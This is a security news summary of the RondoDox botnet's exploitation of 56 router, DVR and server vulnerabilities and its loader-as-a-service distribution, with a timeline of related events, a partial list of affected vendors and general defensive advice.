RondoDox Botnet Exploits 56 Vulnerabilities Across Multiple Vendors

TL;DR

The RondoDox botnet is rapidly expanding its reach by exploiting over 50 vulnerabilities across more than 30 vendors using an 'exploit shotgun' strategy. It's also being distributed via a loader-as-a-service model, bundled with Mirai and Morte payloads. This advanced threat targets various internet-exposed devices, including routers and DVRs, highlighting the need for robust security measures.

Description:
The RondoDox botnet has expanded its attack vectors to include over 50 vulnerabilities across more than 30 vendors, employing an "exploit shotgun" approach. The botnet targets a wide array of internet-exposed devices, including routers, DVRs, NVRs, CCTV systems, and web servers. RondoDox is also being distributed through a loader-as-a-service model, bundled with Mirai and Morte payloads.

RondoDox Botnet Overview

The RondoDox botnet is actively exploiting 56 vulnerabilities across more than 30 vendors, targeting a wide range of internet-exposed infrastructure. This includes routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and other network devices. According to Trend Micro, this activity is described as an "exploit shotgun" approach. The botnet was first documented by Fortinet FortiGuard Labs in July 2025.

Initial Intrusion and Expansion

Trend Micro detected an intrusion attempt on June 15, 2025, where attackers exploited CVE-2023-1389, a security flaw in TP-Link Archer routers that has been actively exploited since late 2022. More recently, RondoDox has broadened its distribution using a "loader-as-a-service" infrastructure, co-packaging itself with Mirai and Morte payloads.

Exploit Arsenal

RondoDox's arsenal includes nearly five dozen security flaws, with 18 having no CVE identifier. The 56 vulnerabilities span vendors such as D-Link, TVT, LILIN, Fiberhome, Linksys, BYTEVALUE, ASMAX, Brickcom, IQrouter, Ricon, Nexxt, NETGEAR, Apache, TBK, TOTOLINK, Meteobridge, Digiever, Edimax, QNAP, GNU, Dasan, Tenda, LB-LINK, AVTECH, Zyxel, Hytec Inter, Belkin, Billion, and Cisco.

Loader-as-a-Service

Late last month, CloudSEK revealed details of a large-scale loader-as-a-Service botnet distributing RondoDox, Mirai, and Morte payloads through SOHO routers, Internet of Things (IoT) devices, and enterprise apps. This is achieved by weaponizing weak credentials, unsanitized inputs, and old CVEs.

AISURU Botnet Connection

Security journalist Brian Krebs noted that the AISURU botnet is drawing a majority of its firepower from compromised IoT devices hosted on U.S. internet providers like AT&T, Comcast, and Verizon. One of the botnet's operators, Forky, is allegedly based in Sao Paulo, Brazil, and is linked to a DDoS mitigation service called Botshield.

RDP Attack Wave

A coordinated botnet operation involving over 100,000 unique IP addresses from at least 100 countries is targeting Remote Desktop Protocol (RDP) services in the U.S., according to GreyNoise.

Vulnerability Exploitation Details

The RondoDox botnet exploits various vulnerabilities, including command injection, path traversal, buffer overflow, authentication bypass, and memory corruption. Researchers have observed the botnet campaign targeting flaws first identified in Pwn2Own contests. The initial RondoDox intrusion observed by Trend Micro on June 15, 2025, involved exploiting CVE-2023-1389 in the WAN interface of the TP-Link Archer AX21 Wi-Fi router.

Key Events Timeline

Key events in the RondoDox vulnerability timeline include:

December 6, 2022: Exploitation of TP-Link AX1800 WAN interface at Pwn2Own Toronto 2022.
January 10, 2023: Trend Micro publishes rule 42150 for the command injection vulnerability.
January 15, 2023: CVE-2023-1389 is reported to TP-Link, with coordinated public disclosure.
June 15, 2025: First RondoDox event detected exploiting CVE-2023-1389.
September 22, 2025: Trend Threat Research triages a RondoDox exploitation spike.
September 25, 2025: CloudSEK reports rapid growth via a loader-as-a-service model.

Vendor Vulnerability List

The botnet targets a variety of vendors and products, exploiting command injection vulnerabilities (CWE-78) in most cases. Some examples include:

D-Link: DNS-343 ShareCenter / goAhead Web Server
TVT: NVMS-9000 Digital Video Recorder (DVR)
LILIN: DVR (Variant A & B)
Fiberhome: Router SR1041F RP0105
Linksys: Router apply.cgi (Variant A & B)

The complete list includes 56 vulnerabilities, with 38 CVEs assigned and 18 without CVEs.

Proactive Security Measures

Defenders should adopt a proactive security posture that includes regular vulnerability assessments, network segmentation, restricted internet exposure, and continuous monitoring for signs of compromise.